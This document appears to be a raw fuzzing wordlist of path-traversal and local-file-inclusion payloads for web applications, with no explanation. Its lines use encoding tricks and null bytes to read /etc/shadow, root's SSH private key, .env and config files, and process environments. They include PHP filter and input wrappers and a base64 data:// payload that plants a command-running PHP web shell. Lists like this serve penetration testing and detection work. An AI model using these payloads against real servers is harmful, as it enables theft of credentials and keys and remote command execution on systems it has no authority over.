..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255c..%255c..%255cwindows%255cwin.ini
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%1c..%c1%1cetc/passwd
C:\windows\win.ini
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
..%e0%80%af..%e0%80%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
../../../../../../../../etc/hosts
....//....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..././..././..././etc/passwd
../../../../../../../../etc/passwd
..;/etc/passwd
/etc/passwd
/etc/passwd/.
/etc/passwd/./././.
/etc/passwd%00
../../../../../../../../etc/passwd%00.jpg
../../../../../../../../etc/passwd%00.pdf
../../../../../../../../etc/passwd%00.png
/etc/passwd%0a
/etc/passwd%ff
../../../../../../../../etc/shadow
/expected/path/../../../../etc/passwd
/home/user/.bash_history
http://localhost/index.php?page=/var/www/html/../../../../etc/passwd
..\..\..\..\..\..\..\..\inetpub\wwwroot\web.config
\\localhost\c$\windows\win.ini
php://filter/convert.base64-encode/resource=index.php
php://filter/resource=config.php
php://input
/proc/self/cmdline
../../../../../../../../proc/self/environ
/proc/self/fd/0
/root/.bash_history
../../../../../../../../root/.ssh/id_rsa
..%u2215..%u2215etc/passw
../../../../../../../../var/www/html/config.php
../../../../../../../../var/www/html/.env
/var/www/html/../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
....\\....\\....\\....\\windows\win.ini
..\..\..\..\..\..\..\..\windows\win.ini
/windows/win.ini
